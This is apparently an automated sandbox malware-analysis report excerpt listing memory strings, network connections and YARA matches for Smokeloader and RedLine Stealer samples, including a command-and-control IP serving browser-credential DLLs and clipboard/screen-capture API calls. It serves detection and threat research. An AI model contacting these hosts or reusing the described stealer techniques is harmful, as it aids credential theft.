                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dlly
                    Source: katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/nss3.dll
                    Source: katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/nss3.dllP
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/p
                    Source: katDDA4.tmp, 0000000C.00000003.2369519792.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dll
                    Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dll0:
                    Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dllX:/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/sqls.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/vcruntime140.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/vcruntime140.dlly
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12BFBKFB
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12KEBFIE
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                    Source: explorer.exe, 00000002.00000000.1401695324.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: Yara match File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_0042EAB0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 7_2_0042EC90
                    Source: Yara match File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

                    System Summary

                    Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                    Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
